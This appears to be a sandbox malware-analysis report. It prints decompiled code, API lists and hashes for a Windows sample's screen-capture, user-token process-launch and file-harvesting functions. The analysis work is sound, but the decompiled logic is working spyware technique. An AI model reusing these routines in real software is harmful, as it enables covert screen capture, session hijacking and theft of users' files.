    • Instruction ID: fbd33349e3d6ac0f6e14bff99680c45f7e22631591a176b0e46059d27092902f
    • Opcode Fuzzy Hash: ca8ecb18dd3d27c67d3f44fffbc5821475682f9e305b00bf990f41ff915d08d2
    • Instruction Fuzzy Hash: F1B092252404006AFE610721AD06B663A59B358309F828075B581E45A8DA28E8098A18
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 44%
    			E0040970D(WCHAR* _a4, char _a8, signed int _a12) {
    				// Not executed in the sandbox. The three libraries and their exports are loaded by name from the
    				// decrypted config, so the names are not on this page. The call pattern (a startup struct with
    				// version field 1, a DC created from a device name, capability queries 8 and 10, raster op
    				// 0x40cc0020, encoder records of 0x4c bytes with a string at +0x30, and an image saved to a
    				// stream by CLSID) is the GDI/GDI+ screen-capture idiom: _a4 names the encoder (MIME type),
    				// _a8 is an encoder parameter (quality), _a12 an optional square capture size around the cursor.
    				// Returns the stream holding the encoded image, or 0. This reading is inferred from the code
    				// and is not a sandbox finding.
    				void* _v12;
    				WCHAR** _v16;
    				void* _v20;
    				void* _v24;
    				_Unknown_base(*)()* _v28;
    				struct HDC__* _v32;
    				struct tagPOINT _v40;
    				_Unknown_base(*)()* _v44;
    				intOrPtr _v48;
    				_Unknown_base(*)()* _v52;
    				_Unknown_base(*)()* _v56;
    				_Unknown_base(*)()* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				char _v88;
    				_Unknown_base(*)()* _v92;
    				intOrPtr _v96;
    				char _v124;
    				signed int _v128;
    				struct HINSTANCE__* _v132;
    				struct HINSTANCE__* _v136;
    				struct HINSTANCE__* _v140;
    				char _v144;
    				struct _ICONINFO _v164;
    				char _v180;
    				intOrPtr _t159;
    				intOrPtr _t161;
    				intOrPtr _t163;
    				intOrPtr _t165;
    				intOrPtr _t167;
    				intOrPtr _t169;
    				intOrPtr _t171;
    				intOrPtr _t173;
    				_Unknown_base(*)()* _t174;
    				intOrPtr _t176;
    				intOrPtr _t178;
    				_Unknown_base(*)()* _t179;
    				intOrPtr _t180;
    				intOrPtr _t182;
    				intOrPtr _t184;
    				intOrPtr _t186;
    				intOrPtr _t188;
    				intOrPtr _t190;
    				intOrPtr _t192;
    				intOrPtr _t194;
    				intOrPtr _t196;
    				_Unknown_base(*)()* _t197;
    				intOrPtr _t202;
    				struct HICON__* _t205;
    				signed int _t209;
    				intOrPtr _t211;
    				void* _t216;
    				void* _t239;
    				intOrPtr* _t240;
    				intOrPtr* _t258;
    				intOrPtr _t259;
    				signed int _t260;
    				void* _t261;
    				void* _t263;
    				unsigned int _t270;
    				struct HINSTANCE__* _t271;
    				struct HINSTANCE__* _t272;
    				struct HINSTANCE__* _t273;
    				signed int _t274;
    				signed int _t275;
    				void* _t281;
    
    				_t159 =  *0x416c34; // 0x25df5a8
    				_t1 = _t159 + 0x80; // 0x25dfcc1
    				_t271 = LoadLibraryA( *_t1);
    				_t161 =  *0x416c34; // 0x25df5a8
    				_t2 = _t161 + 0x90; // 0x25dfd29
    				_v28 = GetProcAddress(_t271,  *_t2);
    				_t163 =  *0x416c34; // 0x25df5a8
    				_t4 = _t163 + 0x94; // 0x25dfd49
    				_v72 = GetProcAddress(_t271,  *_t4);
    				_t165 =  *0x416c34; // 0x25df5a8
    				_t6 = _t165 + 0x98; // 0x25dfd69
    				_v68 = GetProcAddress(_t271,  *_t6);
    				_t167 =  *0x416c34; // 0x25df5a8
    				_t8 = _t167 + 0x9c; // 0x25dfd99
    				_v76 = GetProcAddress(_t271,  *_t8);
    				_t169 =  *0x416c34; // 0x25df5a8
    				_t10 = _t169 + 0xa0; // 0x25dfdb9
    				_v80 = GetProcAddress(_t271,  *_t10);
    				_t171 =  *0x416c34; // 0x25df5a8
    				_t12 = _t171 + 0xa4; // 0x25dfde1
    				_v60 = GetProcAddress(_t271,  *_t12);
    				_t173 =  *0x416c34; // 0x25df5a8
    				_t14 = _t173 + 0xa8; // 0x25dfe09
    				_t174 = GetProcAddress(_t271,  *_t14);
    				_v92 = _t174;
    				if(_t271 == 0 || _v28 == 0 || _v72 == 0 || _v68 == 0 || _v76 == 0 || _v80 == 0 || _v60 == 0 || _t174 == 0) {
    					L52:
    					return 0;
    				} else {
    					_t176 =  *0x416c34; // 0x25df5a8
    					_t22 = _t176 + 0x84; // 0x25dfce1
    					_t272 = LoadLibraryA( *_t22);
    					_t178 =  *0x416c34; // 0x25df5a8
    					_t23 = _t178 + 0xac; // 0x25dfe31
    					_t179 = GetProcAddress(_t272,  *_t23);
    					_v84 = _t179;
    					if(_t272 == 0 || _t179 == 0) {
    						goto L52;
    					} else {
    						_t180 =  *0x416c34; // 0x25df5a8
    						_t25 = _t180 + 0x88; // 0x25dfcf9
    						_t273 = LoadLibraryA( *_t25);
    						_t182 =  *0x416c34; // 0x25df5a8
    						_t26 = _t182 + 0xb0; // 0x25dfe59
    						_t258 = GetProcAddress(_t273,  *_t26);
    						_t184 =  *0x416c34; // 0x25df5a8
    						_t27 = _t184 + 0xb4; // 0x25dfe71
    						_v16 = GetProcAddress(_t273,  *_t27);
    						_t186 =  *0x416c34; // 0x25df5a8
    						_t29 = _t186 + 0xb8; // 0x25dfe91
    						_v12 = GetProcAddress(_t273,  *_t29);
    						_t188 =  *0x416c34; // 0x25df5a8
    						_t31 = _t188 + 0xbc; // 0x25dfeb1
    						_v20 = GetProcAddress(_t273,  *_t31);
    						_t190 =  *0x416c34; // 0x25df5a8
    						_t33 = _t190 + 0xc0; // 0x25dfed9
    						_v44 = GetProcAddress(_t273,  *_t33);
    						_t192 =  *0x416c34; // 0x25df5a8
    						_t35 = _t192 + 0xc4; // 0x25dfef9
    						_v52 = GetProcAddress(_t273,  *_t35);
    						_t194 =  *0x416c34; // 0x25df5a8
    						_t37 = _t194 + 0xc8; // 0x2563619
    						_v56 = GetProcAddress(_t273,  *_t37);
    						_t196 =  *0x416c34; // 0x25df5a8
    						_t39 = _t196 + 0xcc; // 0x25dff11
    						_t197 = GetProcAddress(_t273,  *_t39);
    						_v64 = _t197;
    						if(_t273 == 0 || _t258 == 0 || _v16 == 0 || _v12 == 0 || _v20 == 0 || _v44 == 0 || _v52 == 0 || _v56 == 0 || _t197 == 0) {
    							goto L52;
    						} else {
    							_v24 = 0;
    							_v144 = 1;
    							_v140 = 0;
    							_v136 = 0;
    							_v132 = 0;
    							if(_a12 != 0 || E0040BFE7() != 0) { // E0040BFE7 switches to the interactive window station and desktop (see its subcall APIs below)
    								_push(0);
    								_push( &_v144); // startup struct, version field = 1
    								_push( &_v88); // receives the library token
    								if(_v28() != 0) { // library 1 initialisation; non-zero status is failure
    									goto L51;
    								}
    								_t202 =  *0x416c34; // 0x25df5a8
    								_t56 = _t202 + 0x8c; // 0x25dfd11 (device name from the config)
    								_t259 =  *_t258( *_t56, 0, 0, 0); // device context for the display
    								_v28 = _t259;
    								_v32 = _v16(_t259); // compatible memory DC
    								_v40.y = 0;
    								_v40.x = 0;
    								_t205 = LoadCursorW(0, 0x7f00); // IDC_ARROW
    								_v16 = _t205;
    								GetIconInfo(_t205,  &_v164); // hotspot, used to place the cursor in the capture
    								GetCursorPos( &_v40);
    								if(_a12 == 0) {
    									_t209 = _v12(_t259, 8); // capability 8 = horizontal resolution
    									_t274 = _t209;
    									_t260 = _v12(_t259, 0xa); // capability 10 = vertical resolution
    								} else {
    									_t274 = _a12 & 0x0000ffff; // square of side _a12
    									_t260 = _t274;
    								}
    								_t211 = _v20(_v28, _t274, _t260); // compatible bitmap of the capture size
    								_v48 = _t211;
    								if(_t211 == 0) {
    									L50:
    									_v64(_v32); // delete memory DC
    									_v64(_v28); // delete screen DC
    									_v72(_v88); // shut library 1 down with the token from startup
    									goto L51;
    								} else {
    									_v96 = _v44(_v32, _t211); // select the bitmap into the memory DC, keep the old object
    									_t216 = 0;
    									_t263 = 0;
    									if(_a12 != 0) { // centre the square on the cursor; the cursor position becomes relative to it
    										_t270 = (_a12 & 0x0000ffff) >> 1;
    										_t216 = _v40.x - _t270;
    										_v40.x = _v40.x - _t216;
    										_t263 = _v40.y - _t270;
    										_v40.y = _v40.y - _t263;
    									}
    									_v52(_v32, 0, 0, _t274, _t260, _v28, _t216, _t263, 0x40cc0020); // block transfer from the screen DC; 0x40cc0020 = SRCCOPY | CAPTUREBLT
    									DrawIcon(_v32, _v40.x - _v164.xHotspot, _v40.y - _v164.yHotspot, _v16); // paint the cursor into the capture
    									_push( &_v12);
    									_push(0);
    									_push(_v48);
    									_v12 = 0;
    									if(_v68() != 0 || _v12 == 0) { // library 1: image object from the bitmap pushed above, result in _v12
    										L49:
    										_v44(_v32, _v96);
    										_v56(_v48);
    										goto L50;
    									} else {
    										_push( &_v20);
    										_push( &_a12);
    										_a12 = 0;
    										_v20 = 0;
    										if(_v80() != 0) { // encoder enumeration: count into _a12, byte size into _v20
    											L48:
    											_v76(_v12);
    											goto L49;
    										}
    										_t231 = _v20;
    										if(_v20 == 0 || _a12 == 0) {
    											goto L48;
    										} else {
    											_t261 = E0040F0A8(_t231);
    											if(_t261 == 0) {
    												goto L48;
    											}
    											_v60(_a12, _v20, _t261); // fill _t261 with the encoder records
    											_t275 = 0;
    											if(_a12 <= 0) {
    												L40:
    												E0040F0C0(_t261);
    												if(_v20 == 0) {
    													_push( &_v24);
    													_push(1);
    													_push(0);
    													if(_v84() == 0 && _v24 != 0) { // library 2: growable memory stream into _v24 (args 0, 1: no initial memory, free on release)
    														_v128 = 0; // parameter count
    														if(_a8 > 0) {
    															E0040F0FC( &_v124, 0x401d98, 0x10); // 16-byte parameter GUID copied from .rdata
    															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x64)) = 4; // value type: 32-bit integer
    															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x68)) = 1; // one value
    															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x60)) =  &_a8; // the value itself
    															_v128 = _v128 + 1;
    														}
    														_t239 = _v92(_v12, _v24,  &_v180,  &_v128); // save the image to the stream with encoder CLSID _v180 and the parameter list; 0 = success
    														_t240 = _v24;
    														if(_t239 == 0) {
    															 *((intOrPtr*)( *_t240 + 0x14))(_t240, 0, 0, 0, 0); // vtable slot 0x14 of a stream is Seek: rewind to offset 0 for the caller
    														} else {
    															 *((intOrPtr*)( *_t240 + 8))(_t240); // slot 8 is Release: drop the stream on failure
    															_v24 = 0;
    														}
    													}
    												}
    												goto L48;
    											}
    											// records are 0x4c bytes with a string pointer at +0x30 (the MIME type in the ImageCodecInfo layout); find the one named by _a4
    											_t108 = _t261 + 0x30; // 0x30
    											_v16 = _t108;
    											while(lstrcmpiW(_a4,  *_v16) != 0) {
    												_v16 = _v16 + 0x4c;
    												_t275 = _t275 + 1;
    												if(_t275 < _a12) {
    													continue;
    												}
    												goto L40;
    											}
    											E0040F0FC( &_v180, _t275 * 0x4c + _t261, 0x10); // copy that record's leading 16-byte CLSID
    											_v20 = 0;
    											goto L40;
    										}
    									}
    								}
    							} else {
    								L51:
    								return _v24;
    							}
    						}
    					}
    				}
    			}

    Instruction addresses
    • One entry per statement line of the listing above, in the same order; 0x00000000 marks a line to which the decompiler attributed no address.
    0x00409716
    0x0040971e
    0x0040972a
    0x0040972c
    0x00409731
    0x0040973e
    0x00409741
    0x00409746
    0x00409753
    0x00409756
    0x0040975b
    0x00409768
    0x0040976b
    0x00409770
    0x0040977d
    0x00409780
    0x00409785
    0x00409792
    0x00409795
    0x0040979a
    0x004097a7
    0x004097aa
    0x004097af
    0x004097b6
    0x004097be
    0x004097c3
    0x00409bce
    0x00000000
    0x00409807
    0x00409807
    0x0040980c
    0x00409818
    0x0040981a
    0x0040981f
    0x00409826
    0x0040982c
    0x00409831
    0x00000000
    0x0040983f
    0x0040983f
    0x00409844
    0x00409850
    0x00409852
    0x00409857
    0x00409864
    0x00409866
    0x0040986b
    0x00409878
    0x0040987b
    0x00409880
    0x0040988d
    0x00409890
    0x00409895
    0x004098a2
    0x004098a5
    0x004098aa
    0x004098b7
    0x004098ba
    0x004098bf
    0x004098cc
    0x004098cf
    0x004098d4
    0x004098e1
    0x004098e4
    0x004098e9
    0x004098f0
    0x004098f6
    0x004098fb
    0x00000000
    0x00409947
    0x00409947
    0x0040994a
    0x00409954
    0x0040995a
    0x00409960
    0x00409967
    0x00409976
    0x0040997d
    0x00409981
    0x00409987
    0x00000000
    0x00000000
    0x0040998d
    0x00409995
    0x0040999d
    0x004099a0
    0x004099ac
    0x004099af
    0x004099b2
    0x004099b5
    0x004099c3
    0x004099c6
    0x004099d0
    0x004099da
    0x004099e7
    0x004099ed
    0x004099f2
    0x004099dc
    0x004099dc
    0x004099e0
    0x004099e0
    0x004099f9
    0x004099fc
    0x00409a01
    0x00409bb7
    0x00409bba
    0x00409bc0
    0x00409bc6
    0x00000000
    0x00409a07
    0x00409a0e
    0x00409a11
    0x00409a13
    0x00409a19
    0x00409a25
    0x00409a27
    0x00409a29
    0x00409a2c
    0x00409a2e
    0x00409a2e
    0x00409a42
    0x00409a5f
    0x00409a68
    0x00409a69
    0x00409a6a
    0x00409a6d
    0x00409a75
    0x00409ba8
    0x00409bae
    0x00409bb4
    0x00000000
    0x00409a84
    0x00409a87
    0x00409a8b
    0x00409a8c
    0x00409a8f
    0x00409a97
    0x00409ba2
    0x00409ba5
    0x00000000
    0x00409ba5
    0x00409a9d
    0x00409aa2
    0x00000000
    0x00409ab1
    0x00409ab6
    0x00409aba
    0x00000000
    0x00000000
    0x00409ac7
    0x00409aca
    0x00409acf
    0x00409b0c
    0x00409b0d
    0x00409b15
    0x00409b1e
    0x00409b22
    0x00409b23
    0x00409b29
    0x00409b30
    0x00409b36
    0x00409b43
    0x00409b4e
    0x00409b5c
    0x00409b69
    0x00409b6d
    0x00409b6d
    0x00409b81
    0x00409b86
    0x00409b89
    0x00409b9f
    0x00409b8b
    0x00409b8e
    0x00409b91
    0x00409b91
    0x00409b89
    0x00409b29
    0x00000000
    0x00409b15
    0x00409ad1
    0x00409ad4
    0x00409ad7
    0x00409ae9
    0x00409aed
    0x00409af1
    0x00000000
    0x00000000
    0x00000000
    0x00409af3
    0x00409b04
    0x00409b09
    0x00000000
    0x00409b09
    0x00409aa2
    0x00409a75
    0x00409bc9
    0x00409bc9
    0x00000000
    0x00409bc9
    0x00409967
    0x004098fb
    0x00409831

    APIs
    • LoadLibraryA.KERNELBASE(025DFCC1), ref: 00409724
    • GetProcAddress.KERNELBASE(00000000,025DFD29), ref: 00409738
    • GetProcAddress.KERNELBASE(00000000,025DFD49), ref: 0040974D
    • GetProcAddress.KERNELBASE(00000000,025DFD69), ref: 00409762
    • GetProcAddress.KERNELBASE(00000000,025DFD99), ref: 00409777
    • GetProcAddress.KERNELBASE(00000000,025DFDB9), ref: 0040978C
    • GetProcAddress.KERNELBASE(00000000,025DFDE1), ref: 004097A1
    • GetProcAddress.KERNELBASE(00000000,025DFE09), ref: 004097B6
    • LoadLibraryA.KERNELBASE(025DFCE1), ref: 00409812
    • GetProcAddress.KERNELBASE(00000000,025DFE31), ref: 00409826
    • LoadLibraryA.KERNELBASE(025DFCF9), ref: 0040984A
    • GetProcAddress.KERNELBASE(00000000,025DFE59), ref: 0040985E
    • GetProcAddress.KERNELBASE(00000000,025DFE71), ref: 00409872
    • GetProcAddress.KERNELBASE(00000000,025DFE91), ref: 00409887
    • GetProcAddress.KERNELBASE(00000000,025DFEB1), ref: 0040989C
    • GetProcAddress.KERNELBASE(00000000,025DFED9), ref: 004098B1
    • GetProcAddress.KERNELBASE(00000000,025DFEF9), ref: 004098C6
    • GetProcAddress.KERNELBASE(00000000,02563619), ref: 004098DB
    • GetProcAddress.KERNELBASE(00000000,025DFF11), ref: 004098F0
    • LoadCursorW.USER32(00000000,00007F00), ref: 004099B5
    • GetIconInfo.USER32(00000000,?), ref: 004099C6
    • GetCursorPos.USER32(?), ref: 004099D0
    • DrawIcon.USER32(00406101,?,?,?), ref: 00409A5F
      • Part of subcall function 0040BFE7: OpenWindowStationA.USER32(025DFAF9,00000000,10000000), ref: 0040BFFB
      • Part of subcall function 0040BFE7: SetProcessWindowStation.USER32(00000000), ref: 0040C008
      • Part of subcall function 0040BFE7: OpenDesktopA.USER32(025DFC59,00000000,00000000,10000000), ref: 0040C01D
      • Part of subcall function 0040BFE7: SetThreadDesktop.USER32(00000000), ref: 0040C02A
      • Part of subcall function 0040BFE7: CloseDesktop.USER32(00000000), ref: 0040C033
      • Part of subcall function 0040BFE7: CloseWindowStation.USER32(00000000), ref: 0040C03A
    • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 00409ADF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Load$DesktopLibraryStationWindow$CloseCursorIconOpen$DrawInfoProcessThreadlstrcmpi
    • String ID: L
    • API String ID: 901220281-2909332022
    • Opcode ID: 4f2e864fd1f4969bfc1566ea5c67134f78baa96b8f82c3861c43e8f6cabf710d
    • Instruction ID: 9d643f994ddb16f5ff3c933fed75c2ace1783db80c7a6442152f82826a9d48c5
    • Opcode Fuzzy Hash: 4f2e864fd1f4969bfc1566ea5c67134f78baa96b8f82c3861c43e8f6cabf710d
    • Instruction Fuzzy Hash: 98E11371A01218EFCF219FA4ED88AEEBBB9FF48710F15807AF515A2261D7349941CF94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0040BDF2(intOrPtr __eax, long _a4, WCHAR* _a8, WCHAR* _a12) {
    				void* _v12;
    				void* _v16;
    				_Unknown_base(*)()* _v20;
    				struct _PROCESS_INFORMATION _v36;
    				struct _STARTUPINFOW _v112;
    				int _t49;
    				signed int _t63;
    				struct HINSTANCE__* _t74;
    				_Unknown_base(*)()* _t77;
    				long _t82;
    				intOrPtr _t83;
    				intOrPtr* _t84;
    				intOrPtr* _t85;
    				void* _t86;
    				void* _t87;
    				signed int _t88;
    				struct HINSTANCE__* _t89;
    
    				_t82 = 0x44;
    				_t83 = __eax;
    				_t88 = 0;
    				E0040F173( &_v112,  &_v112, 0, _t82);
    				_v112.cb = _t82;
    				_v112.lpDesktop = _t83;
    				if(_a4 == 0 || ( *0x416cd0 & 0x00000001) != 0 || _t83 == 0 && E0040BFE7() == 0) {
    					L27:
    					_t49 = CreateProcessW(_a8, _a12, 0, 0, 0, 0, 0, 0,  &_v112,  &_v36);
    					if(_t49 == 0) {
    						return _t49;
    					}
    					goto L28;
    				} else {
    					_v16 = 0;
    					_t84 = GetProcAddress( *0x416e28, "WTSGetActiveConsoleSessionId");
    					if(_t84 == 0) {
    						L11:
    						_a4 = 0;
    						if(GetWindowThreadProcessId(GetForegroundWindow(),  &_a4) > 0) {
    							_t86 = OpenProcess(0x400, 0, _a4);
    							if(_t86 != 0) {
    								if(OpenProcessToken(_t86, 0xb,  &_v16) != 0) {
    									_t88 = 1;
    								}
    								CloseHandle(_t86);
    							}
    						}
    						if(_t88 != 1) {
    							goto L27;
    						} else {
    							L17:
    							_v12 = 0;
    							if(DuplicateTokenEx(_v16, 0x2000000, 0, 1, 1,  &_v12) != 0) {
    								_t89 = LoadLibraryA("userenv.dll");
    								_v20 = 0;
    								_a4 = 0;
    								if(_t89 != 0) {
    									_t85 = GetProcAddress(_t89, "CreateEnvironmentBlock");
    									_v20 = GetProcAddress(_t89, "DestroyEnvironmentBlock");
    									if(_t85 != 0) {
    										_push(0);
    										_push(_v12);
    										_push( &_a4);
    										if( *_t85() == 0) {
    											_a4 = 0;
    										}
    									}
    								}
    								_t63 = CreateProcessAsUserW(_v12, _a8, _a12, 0, 0, 0, 0x400, _a4, 0,  &_v112,  &_v36);
    								asm("sbb esi, esi");
    								_t88 =  ~( ~_t63);
    								if(_v20 != 0 && _a4 != 0) {
    									_v20(_a4);
    								}
    								CloseHandle(_v12);
    							}
    							CloseHandle(_v16);
    							if(_t88 == 1) {
    								L28:
    								CloseHandle(_v36);
    								CloseHandle(_v36.hThread);
    								return _v36.dwProcessId;
    							} else {
    								goto L27;
    							}
    						}
    					}
    					_t74 = LoadLibraryA("wtsapi32.dll");
    					_a4 = _t74;
    					if(_t74 != 0) {
    						_t87 =  *_t84();
    						if(_t87 != 0xffffffff) {
    							_t77 = GetProcAddress(_a4, "WTSQueryUserToken");
    							if(_t77 != 0) {
    								_push( &_v16);
    								_push(_t87);
    								if( *_t77() != 0) {
    									_t88 = 1;
    								}
    							}
    						}
    						FreeLibrary(_a4);
    						if(_t88 == 1) {
    							goto L17;
    						}
    					}
    					goto L11;
    				}
    			}

    0x0040bdfd
    0x0040bdff
    0x0040be08
    0x0040be0a
    0x0040be0f
    0x0040be12
    0x0040be18
    0x0040bfad
    0x0040bfc1
    0x0040bfc9
    0x0040bfe4
    0x0040bfe4
    0x00000000
    0x0040be3c
    0x0040be47
    0x0040be50
    0x0040be54
    0x0040be9f
    0x0040bea3
    0x0040beb5
    0x0040bec6
    0x0040beca
    0x0040bedb
    0x0040bedf
    0x0040bedf
    0x0040bee1
    0x0040bee1
    0x0040beca
    0x0040beea
    0x00000000
    0x0040bef0
    0x0040bef0
    0x0040bf01
    0x0040bf0c
    0x0040bf1d
    0x0040bf1f
    0x0040bf22
    0x0040bf27
    0x0040bf3b
    0x0040bf43
    0x0040bf48
    0x0040bf4a
    0x0040bf4b
    0x0040bf51
    0x0040bf56
    0x0040bf58
    0x0040bf58
    0x0040bf56
    0x0040bf48
    0x0040bf78
    0x0040bf82
    0x0040bf84
    0x0040bf89
    0x0040bf93
    0x0040bf93
    0x0040bf99
    0x0040bf99
    0x0040bfa2
    0x0040bfab
    0x0040bfcb
    0x0040bfce
    0x0040bfd7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040bfab
    0x0040beea
    0x0040be5b
    0x0040be61
    0x0040be66
    0x0040be6a
    0x0040be6f
    0x0040be79
    0x0040be81
    0x0040be86
    0x0040be87
    0x0040be8c
    0x0040be90
    0x0040be90
    0x0040be8c
    0x0040be81
    0x0040be94
    0x0040be9d
    0x00000000
    0x00000000
    0x0040be9d
    0x00000000
    0x0040be66

    APIs
    • GetProcAddress.KERNEL32(WTSGetActiveConsoleSessionId,00000000), ref: 0040BE4A
    • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 0040BE5B
    • GetProcAddress.KERNEL32(?,WTSQueryUserToken), ref: 0040BE79
    • FreeLibrary.KERNEL32(?), ref: 0040BE94
    • GetForegroundWindow.USER32(?), ref: 0040BEA6
    • GetWindowThreadProcessId.USER32(00000000), ref: 0040BEAD
    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040BEC0
    • OpenProcessToken.ADVAPI32(00000000,0000000B,?), ref: 0040BED3
    • CloseHandle.KERNEL32(00000000), ref: 0040BEE1
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 0040BF04
    • LoadLibraryA.KERNEL32(userenv.dll), ref: 0040BF17
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040BF2F
    • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 0040BF3D
      • Part of subcall function 0040BFE7: OpenWindowStationA.USER32(025DFAF9,00000000,10000000), ref: 0040BFFB
      • Part of subcall function 0040BFE7: SetProcessWindowStation.USER32(00000000), ref: 0040C008
      • Part of subcall function 0040BFE7: OpenDesktopA.USER32(025DFC59,00000000,00000000,10000000), ref: 0040C01D
      • Part of subcall function 0040BFE7: SetThreadDesktop.USER32(00000000), ref: 0040C02A
      • Part of subcall function 0040BFE7: CloseDesktop.USER32(00000000), ref: 0040C033
      • Part of subcall function 0040BFE7: CloseWindowStation.USER32(00000000), ref: 0040C03A
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 0040BF78
    • CloseHandle.KERNEL32(?), ref: 0040BF99
    • CloseHandle.KERNEL32(?), ref: 0040BFA2
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000044,?,?,00000000), ref: 0040BFC1
    • CloseHandle.KERNEL32(?), ref: 0040BFCE
    • CloseHandle.KERNEL32(?), ref: 0040BFD7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Close$Process$HandleWindow$AddressOpenProc$DesktopLibraryStation$CreateLoadThreadToken$DuplicateForegroundFreeUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$WTSGetActiveConsoleSessionId$WTSQueryUserToken$userenv.dll$wtsapi32.dll
    • API String ID: 1454815141-2217652461
    • Opcode ID: e8350258327b90590cf246ec32d3886d1ef024e4475a38c3d5f33f3f1699862c
    • Instruction ID: 10034c37e12677490a1cc527560bbd889662f4706a6bac6e03ae484b67c5473a
    • Opcode Fuzzy Hash: e8350258327b90590cf246ec32d3886d1ef024e4475a38c3d5f33f3f1699862c
    • Instruction Fuzzy Hash: BF514C76900219BFDB119FA0CC88AEF7B79EB04341F06813AFA15F62A0D7758D418B9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00404AB1(WCHAR* __ecx, intOrPtr __edx) {
    				char _v8;
    				void* _v12;
    				char _v16;
    				intOrPtr _v20;
    				WCHAR* _v24;
    				WCHAR* _v572;
    				WCHAR* _v574;
    				struct _WIN32_FIND_DATAW _v620;
    				short _v622;
    				short _v1140;
    				short _v1660;
    				void* _t57;
    				int _t63;
    				long _t67;
    				intOrPtr _t69;
    				WCHAR** _t70;
    				int _t72;
    				intOrPtr _t79;
    				intOrPtr _t82;
    				WCHAR* _t87;
    				long _t89;
    				intOrPtr _t93;
    				signed int _t99;
    				intOrPtr _t100;
    				char _t101;
    				void* _t102;
    
    				_t98 = __edx;
    				_t97 = __ecx;
    				_v20 = __edx;
    				_v24 = __ecx;
    				PathCombineW( &_v1140, __ecx, "*");
    				_v622 = 0;
    				_t57 = FindFirstFileW( &_v1140,  &_v620);
    				_v12 = _t57;
    				if(_t57 != 0xffffffff) {
    					__eflags = 0;
    					do {
    						__eflags = _v620.cFileName - 0x2e;
    						if(_v620.cFileName != 0x2e) {
    							L7:
    							__eflags = _v620.dwFileAttributes & 0x00000010;
    							if((_v620.dwFileAttributes & 0x00000010) == 0) {
    								 *0x416fe8(0x416758);
    								_t99 = 0;
    								__eflags =  *0x416770; // 0x0
    								if(__eflags <= 0) {
    									L21:
    									 *0x416fec(0x416758);
    									Sleep(0x14);
    									L22:
    									__eflags =  *0x416770; // 0x0
    									if(__eflags <= 0) {
    										break;
    									}
    									goto L23;
    								} else {
    									goto L11;
    								}
    								do {
    									L11:
    									_t69 =  *0x416774; // 0x0
    									_t70 = _t69 + _t99 * 4;
    									__eflags =  *_t70;
    									if( *_t70 == 0) {
    										goto L16;
    									}
    									__eflags = _v620.nFileSizeHigh;
    									if(_v620.nFileSizeHigh != 0) {
    										goto L16;
    									}
    									_t72 = PathMatchSpecW( &(_v620.cFileName),  *_t70);
    									__eflags = _t72;
    									if(_t72 == 0) {
    										goto L16;
    									}
    									PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
    									_t101 = _v620.nFileSizeLow;
    									_t79 =  *0x416c34; // 0x25df5a8
    									_t32 = _t79 + 0x16c; // 0x25642f0
    									_v8 = 4;
    									_v16 = 0;
    									__eflags = E00408088(0x80000001,  *_t32,  &_v1140, 0,  &_v16,  &_v8);
    									if(__eflags == 0) {
    										L18:
    										_t82 =  *0x416c34; // 0x25df5a8
    										_t38 = _t82 + 0x170; // 0x25642a0
    										wnsprintfW( &_v1660, 0x103,  *_t38, _v620.nFileSizeLow,  &(_v620.cFileName));
    										_t102 = _t102 + 0x14;
    										_t87 = E0041547E(_t97, _t98, __eflags,  &_v1140, 0,  &_v1660);
    										__eflags = _t87;
    										if(_t87 != 0) {
    											_v8 = _v620.nFileSizeLow;
    											_t93 =  *0x416c34; // 0x25df5a8
    											_t46 = _t93 + 0x16c; // 0x25642f0
    											E004080D1(0x80000001,  *_t46,  &_v1140, 4,  &_v8, 4);
    										}
    										_t89 = WaitForSingleObject( *(_v20 + 4), 0x2710);
    										__eflags = _t89;
    										if(_t89 == 0) {
    											goto L24;
    										} else {
    											goto L21;
    										}
    									}
    									__eflags = _t101 - _v16;
    									if(__eflags != 0) {
    										goto L18;
    									}
    									L16:
    									_t99 = _t99 + 1;
    									__eflags = _t99 -  *0x416770; // 0x0
    								} while (__eflags < 0);
    								goto L21;
    							}
    							PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
    							_t100 = _v20;
    							_t67 = WaitForSingleObject( *(_t100 + 4), 0x3e8);
    							__eflags = _t67;
    							if(_t67 == 0) {
    								break;
    							}
    							_t98 = _t100;
    							_t97 =  &_v1140;
    							E00404AB1( &_v1140, _t100);
    							goto L22;
    						}
    						__eflags = _v574;
    						if(_v574 == 0) {
    							goto L22;
    						}
    						__eflags = _v574 - 0x2e;
    						if(_v574 != 0x2e) {
    							goto L7;
    						}
    						__eflags = _v572;
    						if(_v572 == 0) {
    							goto L22;
    						}
    						goto L7;
    						L23:
    						_t63 = FindNextFileW(_v12,  &_v620);
    						__eflags = _t63;
    					} while (_t63 != 0);
    					L24:
    					FindClose(_v12);
    					return 1;
    				}
    				return 0;
    			}

    0x00404ab1
    0x00404ab1
    0x00404aca
    0x00404acd
    0x00404ad0
    0x00404ad8
    0x00404aed
    0x00404af3
    0x00404af9
    0x00404b02
